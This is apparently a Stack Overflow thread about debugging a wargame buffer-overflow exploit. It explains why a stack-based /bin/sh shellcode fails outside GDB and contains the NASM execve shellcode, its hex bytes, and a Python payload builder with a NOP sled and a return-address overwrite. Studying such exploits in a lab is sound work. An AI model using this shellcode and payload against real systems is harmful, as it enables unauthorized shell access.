Verified correct shellcode segfaults when run normally; “No such file” in GDB…?

Question

For a wargame, I'm exploiting a buffer overflow to inject some shellcode to spawn /bin/sh. I started by writing my own shellcode, but I got some bizarre errors, so I tried a piece of known working shellcode – and got the same error! However, it gets weirder: running it locally (i.e. not on the wargame server) works fine (so I've verified the problem isn't with the code), and running it in GDB produces a different error.

When run normally:

$ ./program < /tmp/shellcode
[program output...]
zsh: segmentation fault  ./program < /tmp/shellcode

When run in GDB:

(gdb) run < /tmp/shellcode
[program output...]
process 2242 is executing new program: /proc/2242/exe
/proc/2242/exe: No such file or directory.

The shellcode can be found here, or, in NASM Intel syntax:

    BITS 32

    ; Set up "/bin/sh" string
    xor eax, eax
    push eax
    push 0x68732F2F
    push 0x6E69622F
    
    ; Set up execve arguments
    mov ebx, esp
    mov ecx, eax
    mov edx, eax
    mov al, 0xB ; execve's ID
    int 0x80

    ; exit()
    xor eax, eax
    inc eax
    int 0x80

I've confirmed in GDB that the code is inserted properly, that it's jumped to in the correct place, and even that execution reaches the int 0x80 that's supposed to spawn a shell – but as soon as you try to si past it, it gives you the error above.

I've also confirmed at the point of the int 0x80 that the registers are, as far as I can tell, in order for an execve call. Here are the inspected registers from my own shellcode (not from the shellcode above, which sets up ecx and edx to null pointers, but this produces the same error):

(gdb) x/i $pc
=> 0xffffdc47:  int    0x80

eax            0xb      11

(gdb) # EBX should point to "/bin/sh"
(gdb) x/s $ebx
0xffffdc4e:     "/bin/sh"

(gdb) # ECX should point to a null-terminated pointer array.
(gdb) x/2wx $ecx
0xffffdc31:     0xffffdc4e      0x00000000

(gdb) # EDX should point to NULL.
(gdb) x/wx $edx
0xffffdc35:     0x00000000

Why does this execve syscall not work? And… what in the world could /proc/2242/exe be? The string sent to execve is "/bin/sh"! Given that this works when run locally, could the issue somehow be with the server's environment?

Some considerations:

file output: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=..., not stripped
ASLR is off.
It's not a pointer alignment issue – I tried aligning them to 4-byte boundaries, and nothin' changed.
/bin/sh exists, so that's not the file that isn't being found.
To reiterate, just to be sure, it works with the exact same binary and the exact same shellcode on another system, so it's not an issue with the code itself.

What environment is the target environment (what distro/platform)? Does it happen to be WSL (Windows Subsystem for Linux)? How do you compile the GCC code (what command line do you use to build the shellcode)? Do you compile with `-zexecstack` to make the stack executable? — Michael Petch, Dec 08 '20 at 09:11
@MichaelPetch The target environment is `Linux [...] 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux`, it's not WSL, the program was compiled with `gcc program.c -fno-stack-protector -z execstack -m32 -o program`, the shellcode was compiled with `nasm shellcode.nas -o shellcode`, and I've indeed verified that execution reaches the `int 0x80` in the shellcode. — obskyr, Dec 08 '20 at 09:15
If `int 0x80` causes a segfault I almost wonder if IA32_EMULATION is off in the target environment. What is the output of this command: `zcat /proc/config.gz | grep IA32`? — Michael Petch, Dec 08 '20 at 09:22
@MichaelPetch I'm not sure it's `int 0x80` that causes the segfault – I tried some shellcode with some `geteuid` syscalls before the `execve` one, and they executed fine in GDB – but when I ran `strace program < input.bin`, it didn't log them. I suspect that when run outside of GDB, the shellcode might not even be reached properly (which is bizarre, as earlier levels of the wargame have confirmed that ASLR is off). — obskyr, Dec 08 '20 at 09:26
On the target system, what is the output of `strace ./program < /tmp/shellcode`? strace should say what the parameters to the system call are. The only unusual thing is that you make the second parameter to the system call NULL. Usually the second parameter is not NULL. Not sure if that is causing a problem. Usually the second parameter is an argv list, and argv[0] is often set to the same as the first parameter to the system call. — Michael Petch, Dec 08 '20 at 09:36
I almost wonder if what is going on is that the exploitable program on the remote server sees the character `\x0b` as some kind of line terminator, and everything from `\x0b` onward in the string is not seen. — Michael Petch, Dec 08 '20 at 10:02
Syscalls don’t segfault when given bad pointer arguments; they return errors. Which instruction gets the segfault? What is $eax after the `int 0x80` is executed? — Mark Plotnick, Dec 08 '20 at 12:11
@MichaelPetch: It's totally normal on Linux to do `execve("/bin/sh", NULL, NULL)` in shellcode, and even documented by the man page to be treated the same as pointers to empty lists. https://man7.org/linux/man-pages/man2/execve.2.html#NOTES - it's not of course portable to other POSIX systems, but shellcode doesn't care. I guess it may surprise some implementations of `/bin/sh` that `argv[0] == NULL`, though, so it might crash after a successful execve. But that would be detectable by `strace -f`. — Peter Cordes, Dec 08 '20 at 12:12

score 2 · Answer 1 · answered Dec 09 '20 at 07:24

As it turns out, the segfault when running the program normally depends on a difference in GDB's environment! The stack state differs based on various things in the environment, which makes the code jump to the right place in GDB – but since I'm jumping to some shellcode on the stack, it's dependent on the current stack length and thus jumps to some invalid place when run normally. Why it works locally I can only guess, but I suppose my local environment simply lines up with that of GDB on the target machine.
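
To make the environment dependence a bit more concrete, here is a rough sketch of how many bytes the argument and environment strings take up at the top of the stack. Everything below them, including the overflowed buffer, moves by roughly the difference. The environments and paths are made-up examples, and the model ignores alignment, the auxiliary vector and the kernel's own copy of the executable path, so treat the result as an estimate only. As far as I know, GDB adds `LINES` and `COLUMNS` to the debugged program's environment and starts it by absolute path, which is the kind of difference modelled here.

```python
def strings_footprint(argv, env):
    """Bytes used by the NUL-terminated argv strings and "KEY=value" strings."""
    arg_bytes = sum(len(a.encode()) + 1 for a in argv)
    env_bytes = sum(len(f"{k}={v}".encode()) + 1 for k, v in env.items())
    return arg_bytes + env_bytes


# Hypothetical environments, for illustration only.
shell_env = {"PATH": "/usr/bin:/bin", "_": "./program"}
gdb_env = {
    "PATH": "/usr/bin:/bin",
    "_": "/usr/bin/gdb",
    "LINES": "24",      # assumed to be added by GDB
    "COLUMNS": "80",    # assumed to be added by GDB
}

shell_size = strings_footprint(["./program"], shell_env)
gdb_size = strings_footprint(["/home/user/program"], gdb_env)

# A positive value means the buffer sits at a lower address under GDB.
print("approximate stack shift in bytes:", gdb_size - shell_size)
```

If the goal is to make both runs line up rather than to measure the gap, one option is to start the program with the same stripped-down environment in both cases (for example via `env -i` and the same absolute path), or to remove the extra variables inside GDB with `unset env LINES` and `unset env COLUMNS`.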

I figured out three ways to fix this:

I could try various addresses in the vicinity of where I expect the stack pointer to be until I hit paydirt – perhaps a nop slide would help.
Or, as it turns out, gets has an internal buffer on the heap into which things go before they're copied (sans terminating newline) to their final destination. Since that's always in the same place (when ASLR is off), and since I'm injecting my shellcode via gets, I could jump there. And that is indeed what I ended up doing!
But the most facepalm-encouraging way of all is… I can simply run it via the ! shell command of GDB. Despite (gdb) run < /tmp/shellcode erroring out, and ./program < /tmp/shellcode segfaulting, (gdb) !./program < /tmp/shellcode works. This is because running that way ostensibly runs the program "normally" – in a shell – but with GDB's environment, thus ensuring that the stack state matches up.
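
The first option (guessing addresses, helped by a nop slide) could be sketched roughly like this. The offset to the saved return address and the target address are placeholders rather than values from the wargame, and the shellcode bytes are what the NASM listing in the question should assemble to. The layout assumed here is filler, then the overwritten return address, then the NOPs and shellcode placed above it on the stack.

```python
import struct
import sys

# Expected encoding of the NASM listing in the question (28 bytes).
SHELLCODE = bytes.fromhex(
    "31c0" "50" "682f2f7368" "682f62696e"  # xor eax,eax / push eax / push "//sh" / push "/bin"
    "89e3" "89c1" "89c2" "b00b" "cd80"     # ebx=esp, ecx=edx=0, al=0xb, int 0x80
    "31c0" "40" "cd80"                     # exit()
)


def build_payload(offset, ret_addr, sled_len=64, shellcode=SHELLCODE):
    """Filler + return address + NOP sled + shellcode, terminated for gets()."""
    payload = b"A" * offset                 # fill up to the saved return address
    payload += struct.pack("<I", ret_addr)  # little-endian 32-bit address
    payload += b"\x90" * sled_len           # NOP sled: any address inside it works
    payload += shellcode
    if b"\n" in payload:
        # gets() stops reading at a newline, so the rest would never be copied.
        raise ValueError("payload contains a newline byte")
    return payload + b"\n"


if __name__ == "__main__":
    # Hypothetical values: 76 bytes to the return address, a guess inside the sled.
    sys.stdout.buffer.write(build_payload(offset=76, ret_addr=0xFFFFDC60))
```

A longer sled tolerates a larger mismatch between the guessed address and the real one, which is exactly the slack needed when the stack shifts between GDB and a normal run. Note that gets() only stops at a newline or end of input, so bytes such as the `0x0b` in `mov al, 0xB` pass through untouched.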

So what about the GDB error? The /proc/1234/exe: No such file or directory. one? Well, here's the punchline: that error is unrelated, and happens even with a correct solution. As soon as the int 0x80 of an execve syscall is reached, GDB produces that error (and for some reason forgets the program that's being run, as well). I have absolutely no idea why it happens – if anyone has a clue, please share.

obskyr

Run your program under `strace -f` to see the execve and what happens after. If you're passing that path to an execve system call, it probably doesn't exist if it's a literal 1234 as the PID it's looking for. – Peter Cordes Dec 09 '20 at 14:19
@PeterCordes That's an example! In reality, the PID of the process goes there. The string "/bin/sh\0" is where `ebx` points – that error happens even with the solution that's verified working. – obskyr Dec 09 '20 at 16:19
Oh, if invoked with `argv[0] == NULL`, your shell is probably printing its own name as `/proc/<PID>/exe` where it would normally print `/bin/sh` or however it was invoked. So some shell command it tried to execute produced that error message. Again, use `strace -f` to trace into forks and execs to see what the newly-execed process is doing. Look for a system call that returns `-ENOENT`. – Peter Cordes Dec 09 '20 at 16:28
@PeterCordes That's a smart hypothesis! But I don't think so: this happens even when `ecx` points to `{"/bin/sh\0", 0}`. – obskyr Dec 09 '20 at 16:31
Ok, well `strace` into the newly execed process and find out what is happening, then, and what syscall returned `-ENOENT` that convinced something to print that error message. If you want any help explaining that, just use strace and edit the output into your question. – Peter Cordes Dec 09 '20 at 16:47
@PeterCordes I can't, since no process is actually successfully spawned when running in GDB – running `si` to step past the `int 0x80` immediately produces the error. – obskyr Dec 09 '20 at 16:49
`strace` is a shell command, not a GDB command! It "attaches" to a process similarly to how GDB does, but asks the kernel to trace system calls, instead of doing asm single-step and so on. Also, your answer says you figured out what was wrong, so you should be able to fix the addresses in the exploit payload to work with whatever stack address is necessary. – Peter Cordes Dec 09 '20 at 16:54
@PeterCordes Ah, I understand what you'd like to see now! `strace` prints `execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0`. Executes flawlessly in the shell. – obskyr Dec 09 '20 at 17:02
Oh, I think I misunderstood where the error was coming from. It's printed by GDB as it tries to follow the execve? That makes sense, after an execve it would have to open the new executable. Does `ls -l /proc/<PID>/exe` show a valid symlink? Or more importantly, does actually opening it work? Like `md5sum /proc/1234/exe` – Peter Cordes Dec 09 '20 at 17:13
@PeterCordes `No such file or directory.` Same with `/proc/1234/cwd` and `/proc/1234/cmdline`. – obskyr Dec 09 '20 at 17:16
`/proc` is how the kernel exports info about currently running processes. Obviously you have to do this *while* that PID exists as a running process, e.g. by single-stepping past the execve system call or otherwise arranging to stop inside the newly-execed process. I don't think it's possible that you get "No such file or directory" if the process is running; every process definitely will have a `/proc/<PID>/cwd`, even if it's a broken symlink to a now-deleted directory. (Try using `stat` or `ls -l`, which will use `lstat` by default instead of `stat`, to not follow symlinks.) – Peter Cordes Dec 09 '20 at 17:21
If you can't get GDB to single-step past / into `execve`, make the new process something long-running like `sleep 10m`. Or an interactive `/bin/sh` that blocks waiting for input from stdin (if stdin is open on a terminal, which won't be the case for your exploit if you redirect from a file; maybe use `cat exploit - | ./target`). – Peter Cordes Dec 09 '20 at 17:23
